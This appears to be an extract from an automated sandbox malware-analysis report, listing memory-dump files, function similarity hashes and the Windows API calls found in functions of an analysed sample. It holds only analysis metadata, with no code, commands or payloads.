                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                          • Opcode ID: fb5ae9e7c0d8b9497725b496c87f3e021e9d7153e0b9ef1140edbdaef5524492
                                                                                                                                                                                          • Instruction ID: 29a39c358811bc528535ee69b4c5df9b6438e9d416777e1411c793166423bb76
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb5ae9e7c0d8b9497725b496c87f3e021e9d7153e0b9ef1140edbdaef5524492
                                                                                                                                                                                          • Instruction Fuzzy Hash: 305103A09087D53DFF3283A4BD55B76BEA95B46304F08858EE0D44A8D2D39CEC94D790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00765F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 007657E3
                                                                                                                                                                                          • __fassign.LIBCMT ref: 0076585E
                                                                                                                                                                                          • __fassign.LIBCMT ref: 00765879
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0076589F
                                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00765F16,00000000,?,?,?,?,?,?,?,?,?,00765F16,?), ref: 007658BE
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00765F16,00000000,?,?,?,?,?,?,?,?,?,00765F16,?), ref: 007658F7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                          • Opcode ID: 45cdb844a890c8ab5ad055e3ff4592a7cda7618f06b399d53c0fe1834b67804e
                                                                                                                                                                                          • Instruction ID: 99c004026c57e9b35d81ac096c615d5ef08871144a87b75e232dc8db1122ee7d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 45cdb844a890c8ab5ad055e3ff4592a7cda7618f06b399d53c0fe1834b67804e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6751B271A00649DFDB10CFA8D885AEEBBF8FF09320F14411AE956E7291E734AD51DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 007530BB
                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 007530C3
                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00753151
                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0075317C
                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 007531D1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                          • Opcode ID: 14195ed5a320403b76e0be325b83bd3f8bd3fddf93660f6d2f5419943bd9ea95
                                                                                                                                                                                          • Instruction ID: 5613df17fac3e0f6c88b73007b82afe90e35ce2356d9e04941f5cec9c9c3fd09
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14195ed5a320403b76e0be325b83bd3f8bd3fddf93660f6d2f5419943bd9ea95
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0418634A0060CDBCF10DF68C885ADE7BB5AF443A5F148155EC196B3B2D7B99B09CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007B3AD7
                                                                                                                                                                                            • Part of subcall function 007B3AAB: _wcslen.LIBCMT ref: 007B3AF8
                                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007B1B6F
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B1B7E
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B1C26
                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 007B1C56
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                                          • Opcode ID: 89f0e0ad0ab8d57b6eb39b50ed54350614e0e13e5364a59a5d72d72fee452054
                                                                                                                                                                                          • Instruction ID: e1e6a5a368afa852ed547a44834e135f730b13f9dc5e6017cac1782c22a05c00
                                                                                                                                                                                          • Opcode Fuzzy Hash: 89f0e0ad0ab8d57b6eb39b50ed54350614e0e13e5364a59a5d72d72fee452054
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41D671600504EFDB109F24C845FEABBE9EF45324F948069F8159B292D778ED41CBE1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0079D7CD,?), ref: 0079E714
                                                                                                                                                                                            • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0079D7CD,?), ref: 0079E72D
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0079D7F0
                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0079D82A
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079D8B0
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079D8C6
                                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0079D90C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                                          • Opcode ID: b95e298368022284284c72909c52fe65c1e8d9ad5fdb2d5eb9cd9200fb9c2457
                                                                                                                                                                                          • Instruction ID: f5ba34f3d2b5151bf8466b0e48dbd57155179a6676168cda4b58e1e29d08b5fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: b95e298368022284284c72909c52fe65c1e8d9ad5fdb2d5eb9cd9200fb9c2457
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE416771905218DEDF22EFA4D985EDD77B8AF08340F1004EAA545EB142EB7CAB88CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007C38B8
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C38EB
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C3920
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007C3952
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007C397C
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C398D
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C39A7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                                          • Opcode ID: 79c5dd02180a45a4b6d30883f34e852d712a4981f0866a646715088d5434eabb
                                                                                                                                                                                          • Instruction ID: b948abd06f9135b865c66c5ea3a8bb672e909e163b205cba3e52c1793c0eef74
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79c5dd02180a45a4b6d30883f34e852d712a4981f0866a646715088d5434eabb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C311F30604255AFDB618F48DC89F643BE1FB8A724F1581ACF5508B2B2CBB9AD84DB11
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007980D0
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007980F6
                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 007980F9
                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00798117
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00798120
                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00798145
                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00798153
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                          • Opcode ID: 1743a9f92de0e5c75e7db91074a989f9f4123ae7934c103fb4484eae9c0301ba
                                                                                                                                                                                          • Instruction ID: 1f3e7b7ffc2c81a227c918dcc5048a79f3dfa351d3abd08542c33d4f9f4dcdb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1743a9f92de0e5c75e7db91074a989f9f4123ae7934c103fb4484eae9c0301ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA21A77260021DAFDF50DFA8DC88CBB77ACEB093607048529FE15DB290DA78DD468765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007981A9
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007981CF
                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 007981D2
                                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 007981F3
                                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 007981FC
                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00798216
                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00798224
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                          • Opcode ID: 7283b5c5d28ee190a6e2a36c372acf2318b5c03ff4eebbcfc45696aa9243fc5a
                                                                                                                                                                                          • Instruction ID: 01edc8986da738985dd0cae6a6a8038dc65636c3eaef1b69e2113c6623224e61
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7283b5c5d28ee190a6e2a36c372acf2318b5c03ff4eebbcfc45696aa9243fc5a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 97218671600508BF9F54DFA8EC89DAA77ECFB0A3607048129F905CB1A1DA78ED42C765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 007A0E99
                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A0ED5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                          • Opcode ID: cc7925ff703bb6218e12f14d039ae7c274a740ab62174e3c33dc11f914da7c8f
                                                                                                                                                                                          • Instruction ID: ad7c8af71722c8a2b8a8ce0c4af3989d49d818a8e7a1f2a499b88699ddc0ce96
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc7925ff703bb6218e12f14d039ae7c274a740ab62174e3c33dc11f914da7c8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8621597150430AAFDB309F68D804E9AB7A8BF96320F204E29FCA5A72D0D7759841DB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 007A0F6D
                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A0FA8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                          • Opcode ID: 8333a0a4283f371ce4aeebdddc78b117b2e03ca518e66fab9b443d3a1eb00a33
                                                                                                                                                                                          • Instruction ID: 0d9647d0d7b29c4f460a3ec1162c548cb057347cfc370884c1ab8e0bacb5cb57
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8333a0a4283f371ce4aeebdddc78b117b2e03ca518e66fab9b443d3a1eb00a33
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B217771500345DFEB309F688C04A9AB7E8BF96724F204B1DF9A1E72D0E7789981DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00737873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007378B1
                                                                                                                                                                                            • Part of subcall function 00737873: GetStockObject.GDI32(00000011), ref: 007378C5
                                                                                                                                                                                            • Part of subcall function 00737873: SendMessageW.USER32(00000000,00000030,00000000), ref: 007378CF
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007C4BB0
                                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007C4BBD
                                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007C4BC8
                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007C4BD7
                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007C4BE3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                                          • Opcode ID: 58183069cb292f31e235b4d4daae29363f173725b9b2741a3e9835d48a229294
                                                                                                                                                                                          • Instruction ID: a4a4fb6548763382a5e3a2ff3dbd5593f607f77b82f6f612d81211dfeb16814f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58183069cb292f31e235b4d4daae29363f173725b9b2741a3e9835d48a229294
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9411B6B114021DBEEF118F64CC85FE77FADEF08758F014114B608A6050CA75DC21DBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0076DB23: _free.LIBCMT ref: 0076DB4C
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DBAD
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DBB8
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DBC3
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DC17
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DC22
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DC2D
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DC38
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                          • Instruction ID: 22f8d558de9ac32b6157081deb8593f44298909d6c7bde3dec3bbe3434fda455
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D113DB2A51B44EAD530BBB0CC0BFDB77DC9F15700F410C19BA9FEA152EB69B9058650
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
